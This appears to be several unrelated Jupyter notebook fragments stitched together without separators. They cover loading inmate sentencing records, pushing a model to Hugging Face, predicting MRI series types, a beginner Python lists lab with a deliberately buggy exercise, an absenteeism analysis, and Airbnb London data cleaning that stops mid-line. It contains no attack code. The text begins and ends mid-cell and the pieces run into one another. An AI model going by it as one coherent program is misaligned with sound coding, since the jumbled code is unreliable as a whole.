CRF_NUMBER VARCHAR2(40) INCARCERATED_TERM_IN_YEARS NUMBER(10,2) PROBATION_TERM_IN_YEARS NUMBER(10,2) ```file = 'data/Vendor_sentence_Sample_Text.dat' # uncomment this line to use the full dataset # file = 'data/Vendor_sentence_Extract_Text.dat' names =[ "DOC_NUM", "STATUTE_CODE", "SENTENCING_COUNTY", "JS_DATE", "CRF_NUMBER", "INCARCERATED_TERM_IN_YEARS", "PROBATION_TERM_IN_YEARS" ] # first char in file is blank so offset by one in DOC_NUM field widths = [ 11, 40, 40, 9, 40, 13, 13 ] sentence_df = pd.read_fwf(file, header=None, widths=widths, names=names) sentence_df.head(20)Schedule D - Offense Codes Layout======================================================= ``` Name Null? Type ------------------------------- -------- ---- STATUTE_CODE NOT NULL VARCHAR2(38) DESCRIPTION NOT NULL VARCHAR2(40) VIOLENT VARCHAR2(1)```# NOTE: No sample file for this data file = 'data/Vendor_Offense_Extract_Text.dat' names = [ "STATUTE_CODE", "DESCRIPTION", "VIOLENT", ] widths = [ 38, 40, 1 ] offense_df = pd.read_fwf(file, header=None, widths=widths, names=names) offense_df.head(20)Examples- profile_df: demographics- alias_df: - sentence_df: statute- offense_dfNOTE: Don't forget, these examples are based on sample data.active_inmates = profile_df.query("STATUS == 'Active'") joined_df = pd.merge(active_inmates, sentence_df, on='DOC_NUM', how='left') joined_df.head(20) import numpy as np import matplotlib.pyplot as plt graph_df = joined_df.groupby(['RACE'])['DOC_NUM'].count() graph_df.plot.pie(y='RACE', figsize=(5, 5))Enter your login, password from huggingface.co !transformers-cli login !git lfs install !git config --global user.email "" !git config --global user.name "username"# APIkey can be found in https://huggingface.co/settings/token https://UserName:APIkey@huggingface.co/username/model-name-in-huggingface # Get to your directory %cd Albumin # After changes are made add and commit to git !git add . && git commit -m "Update from $USER, pushed model" # Check logs !git log # In case hooks doesnt have a permision to work #!chmod 777 .git/hooks/pre-push !git push # Obviously there is easier way to push your model from transformers import AutoModel model = AutoModel.from_pretrained("model-directory") model.push_to_hub("model-name-in-huggingface") # Also if you have tokenizer from transformers import AutoTokenizer tokenizer = AutoTokenizer.from_pretrained("model-directory") tokenizer.push_to_hub("model-name-in-huggingface")series.predict> Methods for predicting MRI series types using a previously trained `RandomForestClassifier` trained with `scikit-learn`.#export from dicomtools.basics import * #export path = Path('dicomtools/models') _model_path = path/'mr-brain-series-select-rf.skl' _y_names = pd.Index([ 't1', 't2', 'swi', 'dwi', 'other', 'flair', 'adc', 'loc', 'spgr', 'mra' ]) _features = ['MRAcquisitionType', 'AngioFlag', 'SliceThickness', 'RepetitionTime', 'EchoTime', 'EchoTrainLength', 'PixelSpacing', 'ContrastBolusAgent', 'InversionTime', 'DiffusionBValue', 'seq_E', 'seq_EP', 'seq_G', 'seq_GR', 'seq_I', 'seq_IR', 'seq_M', 'seq_P', 'seq_R', 'seq_S', 'seq_SE', 'var_E', 'var_K', 'var_MP', 'var_MTC', 'var_N', 'var_O', 'var_OSP', 'var_P', 'var_S', 'var_SK', 'var_SP', 'var_SS', 'var_TOF', 'opt_1', 'opt_2', 'opt_A', 'opt_ACC_GEMS', 'opt_B', 'opt_C', 'opt_D', 'opt_E', 'opt_EDR_GEMS', 'opt_EPI_GEMS', 'opt_F', 'opt_FAST_GEMS', 'opt_FC', 'opt_FC_FREQ_AX_GEMS', 'opt_FC_SLICE_AX_GEMS', 'opt_FILTERED_GEMS', 'opt_FR_GEMS', 'opt_FS', 'opt_FSA_GEMS', 'opt_FSI_GEMS', 'opt_FSL_GEMS', 'opt_FSP_GEMS', 'opt_FSS_GEMS', 'opt_G', 'opt_I', 'opt_IFLOW_GEMS', 'opt_IR', 'opt_IR_GEMS', 'opt_L', 'opt_M', 'opt_MP_GEMS', 'opt_MT', 'opt_MT_GEMS', 'opt_NPW', 'opt_P', 'opt_PFF', 'opt_PFP', 'opt_PROP_GEMS', 'opt_R', 'opt_RAMP_IS_GEMS', 'opt_S', 'opt_SAT1', 'opt_SAT2', 'opt_SAT_GEMS', 'opt_SEQ_GEMS', 'opt_SP', 'opt_T', 'opt_T2FLAIR_GEMS', 'opt_TRF_GEMS', 'opt_VASCTOF_GEMS', 'opt_VB_GEMS', 'opt_W', 'opt_X', 'opt__'] #export def _get_preds(clf, df, features, y_names=_y_names): y_pred = clf.predict(df[features]) y_prob = clf.predict_proba(df[features]) preds = pd.Series(y_names.take(y_pred)) probas = pd.Series([y_prob[i][pred] for i, pred in enumerate(y_pred)]) return pd.DataFrame({'seq_pred': preds, 'pred_proba': probas}) #export def predict_from_df(df, features=_features, thresh=0.8, model_path=_model_path, clf=None): "Predict series from `df[features]` at confidence threshold `p >= thresh`" if 'plane' not in df.columns: df1 = preprocess(df) labels = extract_labels(df1) df1 = df1.join(labels[['plane', 'contrast', 'seq_label']]) else: df1 = df.copy() if not clf: clf = load(model_path) df1 = df1.join(_get_preds(clf, df1, features)) filt = df1['pred_proba'] < thresh df1['seq_pred'][filt] = 'unknown' return df1 #export def predict_from_folder(path, **kwargs): "Read DICOMs into a `pandas.DataFrame` from `path` then predict series" _, df = get_dicoms(path) return predict_from_df(df, **kwargs)In-Class Coding Lab: ListsThe goals of this lab are to help you understand: - List indexing and slicing - List methods such as insert, append, find, delete - How to iterate over lists with loops Python Lists work like Real-Life Lists In real life, we make lists all the time. To-Do lists. Shopping lists. Reading lists. These lists are collections of items, for example here's my shopping list: ``` Milk, Eggs, Bread, Beer ```There are 4 items in this list.Likewise, we can make a similar list in Python, and count the number of items in the list using the `len()` function:shopping_list = [ 'Milk', 'Eggs', 'Bread', 'Beer'] item_count = len(shopping_list) print("List: %s has %d items" % (shopping_list, item_count))Enumerating the Items in a ListIn real-life, we *enumerate* lists all the time. We go through the items on our list one at a time and make a decision, for example: "Did I add that to my shopping cart yet?"In Python we go through items in our lists with the `for` loop. We use `for` because the number of items is pre-determined and thus a **definite** loop is the appropriate choice. Here's an example:for item in shopping_list: print("I need to buy some %s " % (item)) # or with f-strings for item in shopping_list: print(f"I need to buy some {item}")1.1 You CodeWrite code in the space below to print each stock on its own line. Use a `for` loop and an f-string to print `You own ` before the name of the stock|stocks = [ 'IBM', 'AAPL', 'GOOG', 'MSFT', 'TWTR', 'FB'] #TODO: Write code hereIndexing ListsSometimes we refer to our items by their place in the list. For example "Milk is the first item on the list" or "Beer is the last item on the list."We can also do this in Python, and it is called *indexing* the list. It works the same as a **string slice.****IMPORTANT** The first item in a Python lists starts at index **0**.print("The first item in the list is:", shopping_list[0]) print("The last item in the list is:", shopping_list[3]) print("This is also the last item in the list:", shopping_list[-1]) print("This is the second to last item in the list:", shopping_list[-2])For Loop with IndexYou can also loop through your Python list using an index. In this case we use the `range()` function to determine how many times we should loop, then index the item in the list using the iterator variable from the `for` loop.for i in range(len(shopping_list)): print("I need to buy some %s " % (shopping_list[i]))1.2 You CodeWrite code to print the 2nd and 4th stocks in the list variable `stocks`. Print them on the same line: For example:`AAPL MSFT`stocks = [ 'IBM', 'AAPL', 'GOOG', 'MSFT', 'TWTR', 'FB'] #TODO: Write code hereLists are MutableUnlike strings, lists are **mutable**. This means we can change a value in the list.For example, I want `'Craft Beer'` not just `'Beer'`. I need `Organic Eggs` not `Eggs`.shopping_list = [ 'Milk', 'Eggs', 'Bread', 'Beer'] print(f"Before: {shopping_list}") shopping_list[-1] = 'Craft Beer' shopping_list[1] = 'Organic Eggs' print(f"After {shopping_list}")List MethodsIn your readings and class lecture, you encountered some list methods. These allow us to maniupulate the list by adding or removing items.def print_shopping_list(mylist): print(f"My shopping list: {mylist}") shopping_list = [ 'Milk', 'Eggs', 'Bread', 'Beer'] print_shopping_list(shopping_list) print("Adding 'Cheese' to the end of the list...") shopping_list.append('Cheese') #add to end of list print_shopping_list(shopping_list) print("Adding 'Cereal' to position 0 in the list...") shopping_list.insert(0,'Cereal') # add to the beginning of the list (position 0) print_shopping_list(shopping_list) print("Removing 'Cheese' from the list...") shopping_list.remove('Cheese') # remove 'Cheese' from the list print_shopping_list(shopping_list) print("Removing item from position 0 in the list...") del shopping_list[0] # remove item at position 0 print_shopping_list(shopping_list)1.3 You Code: DebugDebug this program which allows you to manage a list of stocks. This program will loop indefinately. When you enter:- `A` it will ask you for a stock Symbol to add to the beginning of the list, then print the list.- `R` it will ask you for a stock Symbol to remove from the list, then print the list.- `Q` it will quit the program.Example Run: Enter Command: A, R, Q ?a Enter symbol to ADD: appl Your Stocks ['APPL'] Enter Command: A, R, Q ?a Enter symbol to ADD: msft Your Stocks ['MSFT', 'APPL'] Enter Command: A, R, Q ?a Enter symbol to ADD: amzn Your Stocks ['AMZN', 'MSFT', 'APPL'] Enter Command: A, R, Q ?r Enter symbol to REMOVE: msft Your Stocks ['AMZN', 'APPL'] Enter Command: A, R, Q ?q# TODO: debug this code stocks = [] while false: choice = input("Enter Command: A, R, Q ?").upper() if choice == 'Q': break elif choice == 'A': stock = input("Enter symbol to ADD: ").upper() stocks.insert(stock,0) print(f"Your Stocks stocks") elif choice == 'R': stock = input("Enter symbol to REMOVE: ").upper() stoscks.delete(stock) print("Your Stocks {stocks}") else: print("Invalid Command!")SortingSince Lists are mutable. You can use the `sort()` method to re-arrange the items in the list alphabetically (or numerically if it's a list of numbers)shopping_list = [ 'Milk', 'Eggs', 'Bread', 'Beer'] print("Before Sort:", shopping_list) shopping_list.sort() print("After Sort:", shopping_list)The Magic behind `S.split()` and `S.join(list)`Now that we know about lists, we can revisit some of the more confusing string methods like `S.split()` and `S.join(list)``S.split()` takes a string `S` and splits the string into a `list` of values. The split is based on the argument. For example, this splits a string `sentence` into a list `words`, splitting on whitespace.sentence = "I like cheese" words = sentence.split() print(f"words is a {type(words)} values: {words}")To demonstrate it's really a list, let's add a word to the list and then regenerate the sentence with the `S.join(list)` method. `S.join(list)` does the opposite of `split()` joins the `list` back together delimiting each item in the list with `S`.For example: `"-".join([1,2,3])` outputs: `1-2-3`Here we add `'swiss` to the list of `words` before `join()`ing back into a string `i like swiss cheese`.words.insert(2,'swiss') print(words) new_sentence = " ".join(words) print(f"Joined back into a sentence: {new_sentence}")The Magic behind `file.readlines()`With an understanding of lists, we can now better understand how `file.readlines()` actually works. The `file.readlines()` function reads in the entire contents of the file, spliting it into a list of lines. Each item in the list is a line in the file.with open('shopping_list.txt','r') as f: lines = f.readlines() print(f"This is a list: {lines}")List ComprehensionsIf you look at the output of the previous example, you see the newline character `\n` at the end of some items in the list. To remove this, we could write a `for` loop to `strip()` the newline and the add it to another list. This is so, common Python has a shortcut way to do it, called a **list comprehension**.The list comprehension applies a function to each item in the list. It looks like this:`new_list = [ function for item in current_list ]`For example, to strip the newline:print(f"Unstripped: {lines}") # List comprehension stripped_lines = [ line.strip() for line in lines ] print(f"Stripped: {stripped_lines}")In the above example:- The current list is `lines` - The new list is `stripped_lines` and - The function we apply is `strip()` to each `line` in the list of `lines`.List comprehension are handy when we need to parse and tokenize. With Python, we can do this in 2 lines of code.When you run this example, input exactly this: `1, 3.4, 5 ,-4` And marvel how it gets converted into a list of acutal numbers!raw_input = input("Enter a comma-separated list of numbers: ") raw_list = raw_input.split(',') number_list = [ float(number) for number in raw_list ] print(f"Raw Input: {raw_input}") print(f"Tokenized Input {raw_list}") print(f"Parsed to Numbers: {number_list}")Putting it all togetherWinning Lotto numbers. When the lotto numbers are drawn, they are in *any* order, when they are presented they're always sorted lowest to highest. Let's write a program to input numbers, separated by a `,` then storing each to a list, coverting that list to a list of numbers, and then sorting/printing it.ALGORITHM:```1. input a comma-separated string of numbers2. split the string into a list3. parse the list of strings into a list of numbers4. sort the list of numbers4. print the sorted list of numbers like this: 'today's winning numbers are [1, 5, 17, 34, 56]'```Sample Code Run: Enter lotto number drawing: 45, 13, 56, 8, 2 Winning numbers are: [2, 8, 13, 45, 56] 1.4 You Code## TODO: Write program here:Metacognition Rate your comfort level with this week's material so far. **1** ==> I don't understand this at all yet and need extra help. If you choose this please try to articulate that which you do not understand to the best of your ability in the questions and comments section below. **2** ==> I can do this with help or guidance from other people or resources. If you choose this level, please indicate HOW this person helped you in the questions and comments section below. **3** ==> I can do this on my own without any help. **4** ==> I can do this on my own and can explain/teach how to do it to others.`--== Double-Click Here then Enter a Number 1 through 4 Below This Line ==--` Questions And Comments Record any questions or comments you have about this lab that you would like to discuss in your recitation. It is expected you will have questions if you did not complete the code sections correctly. Learning how to articulate what you do not understand is an important skill of critical thinking. Write them down here so that you remember to ask them in your recitation. We expect you will take responsilbity for your learning and ask questions in class.`--== Double-click Here then Enter Your Questions Below this Line ==--`# run this code to turn in your work! from coursetools.submission import Submission Submission().submit()EXPLORATORY DATA ANALYSIS Using Absenteeism at work An UCI dataset Load the training datasetfrom google.colab import drive drive.mount('/content/drive')Mounted at /content/driveImport Libraryimport pandas as pd import seaborn as sns import matplotlib.pyplot as pltImport Datasetdata_cat = pd.read_csv('/content/drive/MyDrive/Colab Notebooks/ABSENTEEISM AT WORK DATASET/Source Code/cleanDataset_categoricalTarget.csv') data_con = pd.read_csv('/content/drive/MyDrive/Colab Notebooks/ABSENTEEISM AT WORK DATASET/Source Code/cleanDataset_continuousTarget.csv')Effect of Age on Absenteeism time in various seasons. Continouus variables# line graph for mean of Absenteeism in hours in different months plt.figure(figsize=(10,5)) mean_abs_per_month = data_con.groupby(['Month of absence','followUp_req'],as_index = False).agg({'Absenteeism time in hours': "mean"}) # print(mean_abs_per_month) sns.lineplot('Month of absence','Absenteeism time in hours',hue = 'followUp_req',style = 'followUp_req',data = mean_abs_per_month) plt.legend(['NoFollowup','Followup']) plt.title("Mean absentism in different months")/usr/local/lib/python3.6/dist-packages/seaborn/_decorators.py:43: FutureWarning: Pass the following variables as keyword args: x, y. From version 0.12, the only valid positional argument will be `data`, and passing other arguments without an explicit keyword will result in an error or misinterpretation. FutureWarningProbability density plot for Service Time, Work load Average/Day, Hit target and Son Categorical variablesdataset_categorical = data_cat plt.figure(2) plt.subplot(121) sns.countplot(dataset_categorical['Disciplinary failure']) plt.subplot(122) sns.countplot(dataset_categorical['Education'])/usr/local/lib/python3.6/dist-packages/seaborn/_decorators.py:43: FutureWarning: Pass the following variable as a keyword arg: x. From version 0.12, the only valid positional argument will be `data`, and passing other arguments without an explicit keyword will result in an error or misinterpretation. FutureWarning /usr/local/lib/python3.6/dist-packages/seaborn/_decorators.py:43: FutureWarning: Pass the following variable as a keyword arg: x. From version 0.12, the only valid positional argument will be `data`, and passing other arguments without an explicit keyword will result in an error or misinterpretation. FutureWarningAggregate of total absent hours for Disciplinary failuredataset_continuous = data_con hit = dataset_continuous.groupby('Hit target')[['Absenteeism time in hours']].mean() ax = hit.plot(kind='bar', figsize=(7,4), legend=True) ax.set_xlabel('hit target') ax.set_ylabel('Absenteeism time in hours') ax.set_title('Average Absenteeism time in hours by hit target') plt.show() data_ser = dataset_continuous.groupby('Service time')[['Absenteeism time in hours']].mean() ax = data_ser.plot(kind='bar', figsize=(7,4), legend=True) ax.set_xlabel('Service time') ax.set_ylabel('Absenteeism time in hours') ax.set_title('Average Absenteeism time in hours by Service time') plt.show()Airbnb Analysis London. Illustrative Guide to modeling variable importance with Airbnb pricing data. Preporocessing the raw data**The Purpose of this notebook is to construct a repetative data preprocessing pipeline. This notebook can be used to run any city from the Airbnb data set and produce the same/similar (some features may not be relavant for certain locations, e.g. zipcode is not relevant to London) data output for modeling pricing.**The data used for this illustrative analysis is downloaded from [Insideairbnb.com](https://insideairbnb.com/).According to the source, Inside Airbnb is an independent, non-commercial set of data that allows you to explore how Airbnb is being used in various cities around the world.By analyzing publicly available information about a city's Airbnb's listings, Inside Airbnb provides filters and key metrics where we can see how Airbnb is being used to compete with the residential housing market.With Inside Airbnb, you can ask fundamental questions about Airbnb in any neighborhood, or across the city as a whole. Questions such as:- How many listings are in a neighborhood and where are they?- What are global (city wide) or local (all the way down to a single unit) historical Airbnb trends - How many houses and apartments are being rented out frequently to tourists and not to long-term residents?- How much are hosts making from renting to tourists (compare that to long-term rentals)- "Which hosts are running a business with multiple listings and where they?- etc..While the data is a rich resource, there are some limitation to using the data. Like nearly evey real dataset, the data quality is fairly poor and requires preprocessing and feature engineering. To utilize as much of the data as we can we will use imputation techniques to fill missing values. There are many features in this dataset but many of them are incomplete and either need be refined using imputation or dropped from the analysis. This data is similar to our rental data in that the data only consists of advertised price. The advertised prices can be set to any arbitrary amount by the host, and hosts that are less experienced with Airbnb will often set these to very low or very high amounts. This dataset is naive to the actual amount paid on a per night basis. Even with the described limitation, I believe this data to be informative of the Airbnb dynamics of a city. ​ Getting Setup Install additional environmental requirements.- Colab comes preconfigured with the majority of the dependencies needed for this lab, but we need to add a few for exploratory data analysis.# # Important library for many geopython libraries # !apt install gdal-bin python-gdal python3-gdal tree # # Install rtree - Geopandas requirment # !apt install python3-rtree # # Install Geopandas # !pip install git+git://github.com/geopandas/geopandas.git # # Install descartes - Geopandas requirment # !pip install descartes # # Install Folium for Geographic data visualization # !pip install folium # # Install plotlyExpress # !pip install plotly_express # !pip install quilt # !quilt install ResidentMario/missingno_dataMount Google Drive- For any city we will need two files. - listings.csv.gz - neighbourhoods.geojsonI have downloaded these files to Google Drive. In this next step we will need to mount My Drive to our linux virtual machine.from google.colab import drive drive.mount('/content/drive')Drive already mounted at /content/drive; to attempt to forcibly remount, call drive.mount("/content/drive", force_remount=True).Load python libraries# Importing required libraries import pandas as pd import numpy as np import missingno as msno from IPython.core.display import HTML from datetime import datetime import seaborn as sns import geopandas as gpd import time from IPython.display import SVG import matplotlib.pyplot as plt plt.style.use('dark_background') plt.rcParams.update({ "lines.color": "white", "patch.edgecolor": "white", "text.color": "white", "axes.facecolor": "#383838", "axes.edgecolor": "lightgray", "axes.labelcolor": "white", "xtick.color": "white", "ytick.color": "white", "grid.color": "lightgray", "figure.facecolor": "#383838", "figure.edgecolor": "#383838", }) %matplotlib inlineLoad Data:- You can choose anyway you want to get the data into the environment. From here on the notebook should handle everything the same.raw_df = pd.read_csv('/content/drive/My Drive/data/london.csv',low_memory=False) pd.set_option('display.max_rows', 50) #set the number of visible rows pd.set_option('display.max_columns', 110) #set the number of visible columns HTML("

Our data has {0} rows and {1} columns.

Let's check our data completeness.

".format(raw_df.shape[0],raw_df.shape[1])) raw_df.info(verbose=True,null_counts=True) RangeIndex: 85068 entries, 0 to 85067 Data columns (total 106 columns): id 85068 non-null int64 listing_url 85068 non-null object scrape_id 85068 non-null int64 last_scraped 85068 non-null object name 85043 non-null object summary 80736 non-null object space 59218 non-null object description 82683 non-null object experiences_offered 85068 non-null object neighborhood_overview 54694 non-null object notes 32799 non-null object transit 54320 non-null object access 4574[...]Processing Data: Visualizing missing data across our features.- Missing Data by Columns, filter to less than 50 to see column names.raw_df = raw_df.replace("nan", np.nan) msno.matrix(raw_df.iloc[:,:raw_df.shape[1]].sample(raw_df.shape[0]),fontsize=9,color=(.3, .84, .77),sort='ascending'); print("Missing Data by Columns, filter to less than 50 to see column names")Missing Data by Columns, filter to less than 50 to see column namesCopy And Drop Unecessary Data:- Becuase this is an illustrative example we will not be running any Natural Language Processing techniques on the free form text features. However we might be able to enhace our feature set by generating more data from these text features later on if we need to.cols_to_drop = ['listing_url', 'scrape_id', 'last_scraped', 'name', 'summary', 'space', 'description', 'neighborhood_overview', 'notes', 'transit', 'access', 'interaction', 'house_rules', 'thumbnail_url', 'medium_url', 'picture_url', 'xl_picture_url', 'host_id', 'host_url', 'host_name', 'host_location', 'host_about', 'host_thumbnail_url', 'host_picture_url', 'host_neighbourhood', 'host_verifications', 'calendar_last_scraped'] df = raw_df.drop(cols_to_drop, axis=1).set_index('id',drop=True) #make a copy of our raw data- There are multiple columns for property location, including an attempt by the site that originally scraped the data to clean up the neighbourhood locations. Some of these columns can be dropped. Because all of the listings are in London, columns relating to city and country can be dropped.- Because we are looking at a specific city in the same country we can drop redundant location data.# lat_long = df[['latitude', 'longitude']] df.drop(['street', 'neighbourhood', 'city', 'market', 'smart_location', 'country_code', 'country', 'is_location_exact'], axis=1, inplace=True)- Visualizing columns with nullsdf.isna().sum()[df.isna().sum()>100].sort_values().plot(kind='barh',figsize=(12,8),color=(.3, .84, .77)) missing_val_columns_to_drop = list(df.isna().sum()[df.isna().sum()>1000].index) missing_val_columns_to_drop.remove('host_response_time') #added back missing_val_columns_to_drop.remove('host_response_rate') #added back missing_val_columns_to_drop.remove('cleaning_fee') #added back missing_val_columns_to_drop.remove('security_deposit') #added back missing_val_columns_to_drop.remove('first_review') #added back missing_val_columns_to_drop.remove('review_scores_rating') #added back missing_val_columns_to_drop.remove('review_scores_accuracy') #added back missing_val_columns_to_drop.remove('review_scores_cleanliness') #added back missing_val_columns_to_drop.remove('review_scores_value') #added back missing_val_columns_to_drop.remove('last_review') #added back print("columns to drop",pd.DataFrame(missing_val_columns_to_drop)) df.drop(missing_val_columns_to_drop, axis=1, inplace=True)Drop repetative columns:print( "Number of mismatches : ",str(sum((df.host_listings_count == df.host_total_listings_count) == False))) df.drop(['host_total_listings_count', 'calculated_host_listings_count', 'calculated_host_listings_count_entire_homes', 'calculated_host_listings_count_private_rooms', 'calculated_host_listings_count_shared_rooms'], axis=1, inplace=True) # df[["host_listings_count","host_total_listings_count"]] # df.loc[((df.host_listings_count == df.host_total_listings_count) == False)][:5] print(df.shape)Number of mismatches : 12 (85068, 52)There are multiple columns for minimum and maximum night stays, but the two main ones will be used as there are few differences between e.g. minimum_nights and minimum_minimum_nights. The latter presumably refers to the fact that min/max night stays can vary over the year. The default (i.e. most frequently applied) min/max night stay values will be used instead.df.drop(['minimum_minimum_nights', 'maximum_minimum_nights', 'minimum_maximum_nights', 'maximum_maximum_nights', 'minimum_nights_avg_ntm', 'maximum_nights_avg_ntm'], axis=1, inplace=True) print(df.shape) # Replacing columns with f/t with 0/1 df.replace({'f': 0, 't': 1}, inplace=True) # Plotting the distribution of numerical and boolean categories df.hist(figsize=(20,20),color=(.3, .84, .77), edgecolor='k', linewidth=0.3);to doWe will drop anything that doesn't have adequate classesdf.drop(['has_availability', 'host_has_profile_pic', 'is_business_travel_ready', 'require_guest_phone_verification', 'require_guest_profile_picture', 'requires_license'], axis=1, inplace=True) # df.dropna(subset=['host_since'], inplace=True) # df.drop('bed_type', axis=1, inplace=True) df.drop('calendar_updated', axis=1, inplace=True) print(df.experiences_offered.value_counts()) df.drop('experiences_offered', axis=1, inplace=True)none 83388 business 582 family 479 social 411 romantic 208 Name: experiences_offered, dtype: int64Cleaning Data Columns:# Converting to datetime df.host_since = pd.to_datetime(df.host_since) # Calculating the number of days df['host_days_active'] = (datetime.now() - df.host_since).astype('timedelta64[D]') # Printing mean and median print("Mean days as host:", round(df['host_days_active'].mean(),0)) print("Median days as host:", df['host_days_active'].median()) # Replacing null values with the median df.host_days_active.fillna(df.host_days_active.median(), inplace=True) print("Null values:", df.host_response_time.isna().sum()) print(f"Proportion: {round((df.host_response_time.isna().sum()/len(df))*100, 1)}%") # # Number of rows without a value for host_response_time which have also not yet had a review len(df[df[['host_response_time', 'first_review']].isnull().sum(axis=1) == 2]) df.host_response_time.fillna("unknown", inplace=True) print("-- -- --") df.host_response_time.value_counts(normalize=True).plot(kind='barh') # Removing the % sign from the host_response_rate string and converting to an integer df.host_response_rate = df.host_response_rate.str[:-1].astype('float64') # Bin into four categories df.host_response_rate = pd.cut(df.host_response_rate, bins=[0, 50, 90, 99, 100], labels=['0-49%', '50-89%', '90-99%', '100%'], include_lowest=True) # Converting to string df.host_response_rate = df.host_response_rate.astype('str') # Replace nulls with 'unknown' df.host_response_rate.replace('nan', 'unknown', inplace=True) # Category counts df.host_response_rate.value_counts()Property Typedf.property_type.value_counts() # Replacing categories that are types of houses or apartments df.property_type.replace({ 'Townhouse': 'House', 'Serviced apartment': 'Apartment', 'Loft': 'Apartment', 'Bungalow': 'House', 'Cottage': 'House', 'Villa': 'House', 'Chalet': 'House' }, inplace=True) # 'Tiny house': 'House', # 'Earth house': 'House', # Replacing other categories with 'other' df.loc[~df.property_type.isin(['House', 'Apartment']), 'property_type'] = 'Other' for col in ['bathrooms', 'bedrooms', 'beds']: df[col].fillna(df[col].median(), inplace=True)Amenities# Creating a set of all possible amenities amenities_list = list(df.amenities) amenities_list_string = " ".join(amenities_list) amenities_list_string = amenities_list_string.replace('{', '') amenities_list_string = amenities_list_string.replace('}', ',') amenities_list_string = amenities_list_string.replace('"', '') amenities_set = [x.strip() for x in amenities_list_string.split(',')] amenities_set = set(amenities_set) amenities_setIn the list above, some amenities are more important than others (e.g. a balcony is more likely to increase price than a fax machine), and some are likely to be fairly uncommon (e.g. 'Electric profiling bed'). Based on previous experience working in the Airbnb property management industry, and research into which amenities are considered by guests to be more important, a selection of the more important amenities will be extracted. These will be further investigated in the EDA section. For example, if it turns out that almost all properties have/do not have a particular amenity, that feature will not be very useful in helping explain differences in prices.The amenities chosen are (slashes indicate separate categories that can be combined):- 24-hour check-in- Air conditioning/central air conditioning- Amazon Echo/Apple TV/DVD player/game console/Netflix/projector and screen/smart TV (i.e. non-basic electronics)- BBQ grill/fire pit/propane barbeque- Balcony/patio or balcony- Beach view/beachfront/lake access/mountain view/ski-in ski-out/waterfront (i.e. great location/views)- Bed linens- Breakfast- Cable TV/TV- Coffee maker/espresso machine- Cooking basics- Dishwasher/Dryer/Washer/Washer and dryer- Elevator- Exercise equipment/gym/private gym/shared gym- Family/kid friendly, or anything containing 'children'- Free parking on premises/free street parking/outdoor parking/paid parking off premises/paid parking on premises- Garden or backyard/outdoor seating/sun loungers/terrace- Host greets you- Hot tub/jetted tub/private hot tub/sauna/shared hot tub/pool/private pool/shared pool- Internet/pocket wifi/wifi- Long term stays allowed- Pets allowed/cat(s)/dog(s)/pets live on this property/other pet(s)- Private entrance- Safe/security system- Self check-in- Smoking allowed- Step-free access/wheelchair accessible, or anything containing 'accessible'- Suitable for eventsdf.loc[df['amenities'].str.contains('24-hour check-in'), 'check_in_24h'] = 1 df.loc[df['amenities'].str.contains('Air conditioning|Central air conditioning'), 'air_conditioning'] = 1 df.loc[df['amenities'].str.contains('Amazon Echo|Apple TV|Game console|Netflix|Projector and screen|Smart TV'), 'high_end_electronics'] = 1 df.loc[df['amenities'].str.contains('BBQ grill|Fire pit|Propane barbeque'), 'bbq'] = 1 df.loc[df['amenities'].str.contains('Balcony|Patio'), 'balcony'] = 1 df.loc[df['amenities'].str.contains('Beach view|Beachfront|Lake access|Mountain view|Ski-in/Ski-out|Waterfront'), 'nature_and_views'] = 1 df.loc[df['amenities'].str.contains('Bed linens'), 'bed_linen'] = 1 df.loc[df['amenities'].str.contains('Breakfast'), 'breakfast'] = 1 df.loc[df['amenities'].str.contains('TV'), 'tv'] = 1 df.loc[df['amenities'].str.contains('Coffee maker|Espresso machine'), 'coffee_machine'] = 1 df.loc[df['amenities'].str.contains('Cooking basics'), 'cooking_basics'] = 1 df.loc[df['amenities'].str.contains('Dishwasher|Dryer|Washer'), 'white_goods'] = 1 df.loc[df['amenities'].str.contains('Elevator'), 'elevator'] = 1 df.loc[df['amenities'].str.contains('Exercise equipment|Gym|gym'), 'gym'] = 1 df.loc[df['amenities'].str.contains('Family/kid friendly|Children|children'), 'child_friendly'] = 1 df.loc[df['amenities'].str.contains('parking'), 'parking'] = 1 df.loc[df['amenities'].str.contains('Garden|Outdoor|Sun loungers|Terrace'), 'outdoor_space'] = 1 df.loc[df['amenities'].str.contains('Host greets you'), 'host_greeting'] = 1 df.loc[df['amenities'].str.contains('Hot tub|Jetted tub|hot tub|Sauna|Pool|pool'), 'hot_tub_sauna_or_pool'] = 1 df.loc[df['amenities'].str.contains('Internet|Pocket wifi|Wifi'), 'internet'] = 1 df.loc[df['amenities'].str.contains('Long term stays allowed'), 'long_term_stays'] = 1 df.loc[df['amenities'].str.contains('Pets|pet|Cat(s)|Dog(s)'), 'pets_allowed'] = 1 df.loc[df['amenities'].str.contains('Private entrance'), 'private_entrance'] = 1 df.loc[df['amenities'].str.contains('Safe|Security system'), 'secure'] = 1 df.loc[df['amenities'].str.contains('Self check-in'), 'self_check_in'] = 1 df.loc[df['amenities'].str.contains('Smoking allowed'), 'smoking_allowed'] = 1 df.loc[df['amenities'].str.contains('Step-free access|Wheelchair|Accessible'), 'accessible'] = 1 df.loc[df['amenities'].str.contains('Suitable for events'), 'event_suitable'] = 1 # Replacing nulls with zeros for new columns # Produces a list of amenity features where one category (true or false) contains fewer than 10% of listings infrequent_amenities = [] for col in df.iloc[:,41:].columns: if df[col].sum() < len(df)/10: infrequent_amenities.append(col) print(infrequent_amenities) # Dropping infrequent amenity features df.drop(infrequent_amenities, axis=1, inplace=True) # Dropping the original amenity feature df.drop('amenities', axis=1, inplace=True)['high_end_electronics', 'bbq', 'nature_and_views', 'gym', 'hot_tub_sauna_or_pool', 'secure', 'smoking_allowed', 'accessible', 'event_suitable']Priceplt.figure(figsize=(14,4)) plt.yscale('log') try: df.price = df.price.str[1:-3] df.price = df.price.str.replace(",", "") df.price = df.price.astype('int64') print(sns.distplot(df.price.values,bins=1000,color='yellow', kde=False)); except: print(sns.distplot(df.price.values,bins=1000,color='yellow', kde=False)); pass df.drop(df[df.price > 1000].index, inplace=True)Security Depositdf.security_deposit = df.security_deposit.str[1:-3] df.security_deposit = df.security_deposit.str.replace(",", "") df.security_deposit.fillna(0, inplace=True) df.security_deposit = df.security_deposit.astype('int64') plt.figure(figsize=(14,4)) plt.yscale('log') print(sns.distplot(df.security_deposit.values,bins=1000,color='red', kde=False));AxesSubplot(0.125,0.125;0.775x0.755)Cleaning Feedf.cleaning_fee = df.cleaning_fee.str[1:-3] df.cleaning_fee = df.cleaning_fee.str.replace(",", "") df.cleaning_fee.fillna(0, inplace=True) df.cleaning_fee = df.cleaning_fee.astype('int64')Extra Peopledf.extra_people = df.extra_people.str[1:-3] 